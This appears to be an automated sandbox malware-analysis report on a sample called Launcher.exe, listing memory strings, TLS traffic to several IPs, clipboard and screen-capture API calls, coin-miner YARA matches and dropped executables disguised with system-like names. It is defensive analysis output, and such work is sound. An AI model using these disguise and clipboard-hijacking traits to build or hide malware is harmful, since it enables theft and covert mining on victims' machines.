                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-PatternCharacter
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Quantifier
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-QuantifierPrefix
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-RegExpUnicodeEscapeSequence
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-SyntaxCharacter
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertion
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-AtomEscape
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-CharacterEscape
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetter
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassEscape
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedAtom
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedPatternCharacter
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-IdentityEscape
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-InvalidBracedQuantifier
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-LegacyOctalEscapeSequence
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Term
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-atomescape
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-term
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1562259858.00000000015D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
                      Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49726 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49729 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49735 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0043E5B0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,29_2_0043E5B0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_03AD1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,29_2_03AD1000
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0043E5B0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,29_2_0043E5B0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0043F276 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,29_2_0043F276
                      Source: Yara matchFile source: 56.3.svchost.exe.55e0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 56.3.svchost.exe.53c0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 56.3.svchost.exe.55e0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.3.wxymrnibweqciwn.exe.2e40000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.3.wxymrnibweqciwn.exe.2c20000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001E.00000003.1864045584.0000000002C20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.1864232126.0000000002E40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000003.1876706321.00000000053C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000003.1876984046.00000000055E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: dump.pcap, type: PCAPMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                      Source: 64.0.RtkAudUService64a.exe.7ff728030000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                      Source: 64.0.RtkAudUService64a.exe.7ff728030000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                      Source: 64.0.RtkAudUService64a.exe.7ff728030000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                      Source: 00000040.00000000.1979728835.00007FF7283B4000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                      PE file contains section with special chars
                      Source: wxymrnibweqciwn.exe.0.drStatic PE information: section name:
                      Source: wxymrnibweqciwn.exe.0.drStatic PE information: section name:
                      Source: wxymrnibweqciwn.exe.0.drStatic PE information: section name:
                      Source: wxymrnibweqciwn.exe.0.drStatic PE information: section name:
                      PE file has nameless sections
                      Source: niyrycbicwuyiuc.exe.0.drStatic PE information: section name:
                      Source: niyrycbicwuyiuc.exe.0.drStatic PE information: section name:
                      Source: niyrycbicwuyiuc.exe.0.drStatic PE information: section name:
                      Source: niyrycbicwuyiuc.exe.0.drStatic PE information: section name:
                      Source: niyrycbicwuyiuc.exe.0.drStatic PE information: section name:
                      Source: niyrycbicwuyiuc.exe.0.drStatic PE information: section name:
                      Source: RuntimeBroker.exe.36.drStatic PE information: section name:
                      Source: RuntimeBroker.exe.36.drStatic PE information: section name:
                      Source: RuntimeBroker.exe.36.drStatic PE information: section name:
                      Source: RuntimeBroker.exe.36.drStatic PE information: section name:
                      Source: RuntimeBroker.exe.36.drStatic PE information: section name:
                      Source: RuntimeBroker.exe.36.drStatic PE information: section name:
                      Source: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_3_0A1F31DC0_3_0A1F31DC
                      Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_3_0A1F31DC0_3_0A1F31DC
                      Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_3_0A1F27900_3_0A1F2790
                      Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_3_0A1F27900_3_0A1F2790
                      Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_3_0A1F31DC0_3_0A1F31DC
                      Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_3_0A1F31DC0_3_0A1F31DC
                      Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_3_0A1F27900_3_0A1F2790
                      Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_3_0A1F27900_3_0A1F2790
                      Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_3_0A1F31DC0_3_0A1F31DC
                      Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_3_0A1F31DC0_3_0A1F31DC
                      Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_3_0A1F27900_3_0A1F2790
                      Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_3_0A1F27900_3_0A1F2790
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001E646028_2_001E6460
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020A4C028_2_0020A4C0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001A553B28_2_001A553B
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001A7B0028_2_001A7B00
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001E4CB028_2_001E4CB0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001C1F5028_2_001C1F50
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001F601028_2_001F6010
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020A03028_2_0020A030
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001A100028_2_001A1000
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001AE03028_2_001AE030
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001CE02028_2_001CE020
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001FC05028_2_001FC050
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001DD07028_2_001DD070
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001FD07028_2_001FD070
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001E609028_2_001E6090
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020B0F028_2_0020B0F0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001BA0F028_2_001BA0F0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001F90F028_2_001F90F0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001FE0F028_2_001FE0F0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001B50E028_2_001B50E0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001C00E028_2_001C00E0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001D011028_2_001D0110
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001F411028_2_001F4110
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001D813028_2_001D8130
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001B915028_2_001B9150
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001D717028_2_001D7170
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001BF19028_2_001BF190
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001B01A028_2_001B01A0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001A41D028_2_001A41D0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_002041D028_2_002041D0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0021823028_2_00218230
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001C320028_2_001C3200
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020221028_2_00202210
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001AD25028_2_001AD250
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001E024028_2_001E0240
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001C529028_2_001C5290
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_002012B028_2_002012B0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001B82B028_2_001B82B0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_002122CA28_2_002122CA
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001A72E028_2_001A72E0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001A831028_2_001A8310
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001BB31028_2_001BB310
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020333028_2_00203330
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001AA30028_2_001AA300
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001CD33028_2_001CD330
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001C732028_2_001C7320
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001E132028_2_001E1320
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001EA35028_2_001EA350
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001F035028_2_001F0350
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001FC35028_2_001FC350
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001C936028_2_001C9360
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001FD3B028_2_001FD3B0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001BE3A028_2_001BE3A0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001D53A028_2_001D53A0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_002093E028_2_002093E0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001E93D028_2_001E93D0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001CA3F028_2_001CA3F0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020842028_2_00208420
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001BD41028_2_001BD410
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001D641028_2_001D6410
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001B043028_2_001B0430
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001B443028_2_001B4430
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001F343028_2_001F3430
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001B245028_2_001B2450
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001C545028_2_001C5450
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001CE49028_2_001CE490
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001F84C028_2_001F84C0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001B351028_2_001B3510
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001B653028_2_001B6530
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001C353028_2_001C3530
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001FF53028_2_001FF530
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001F957628_2_001F9576
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001DB56028_2_001DB560
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0022559228_2_00225592
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001DC5A028_2_001DC5A0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001DF5D028_2_001DF5D0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001C55C028_2_001C55C0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001CB5F028_2_001CB5F0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_002095D028_2_002095D0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001AC61028_2_001AC610
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020163028_2_00201630
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001F763028_2_001F7630
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001B062028_2_001B0620
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001E965028_2_001E9650
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020464028_2_00204640
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001E166028_2_001E1660
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001FA66028_2_001FA660
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001AE69028_2_001AE690
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001F569028_2_001F5690
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001CC6D028_2_001CC6D0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001B76C028_2_001B76C0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001AB6F028_2_001AB6F0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001C66F028_2_001C66F0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001DD6E028_2_001DD6E0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001D86E028_2_001D86E0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001A971828_2_001A9718
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001AA70028_2_001AA700
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001F570028_2_001F5700
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0022371828_2_00223718
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001B974028_2_001B9740
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001AD7F028_2_001AD7F0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001F07F028_2_001F07F0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001BD81028_2_001BD810
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001DA81028_2_001DA810
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020280028_2_00202800
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001A585628_2_001A5856
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001B384028_2_001B3840
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001DC87028_2_001DC870
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001BF86028_2_001BF860
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001C98A028_2_001C98A0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001E78A028_2_001E78A0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001C28C028_2_001C28C0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001BE90028_2_001BE900
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001AC90628_2_001AC906
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001D890028_2_001D8900
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020D90A28_2_0020D90A
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001F692028_2_001F6920
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001B694028_2_001B6940
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001AB96028_2_001AB960
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001A899028_2_001A8990
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001FD98028_2_001FD980
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001B89A028_2_001B89A0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001DE9C028_2_001DE9C0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_00203A2028_2_00203A20
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001F1A0028_2_001F1A00
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001CCA3028_2_001CCA30
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001CDA3028_2_001CDA30
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001D3A5028_2_001D3A50
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001FBA4028_2_001FBA40
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001E8A7028_2_001E8A70
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001C3A9028_2_001C3A90
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_00207AB028_2_00207AB0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001B7AA028_2_001B7AA0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001D8AA028_2_001D8AA0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001A9AF628_2_001A9AF6
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001ACB0F28_2_001ACB0F
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001B7B5028_2_001B7B50
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001EEB4028_2_001EEB40
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001B0B9028_2_001B0B90
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001BDB8028_2_001BDB80
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001F7BB028_2_001F7BB0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001B1BA028_2_001B1BA0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001CABF028_2_001CABF0
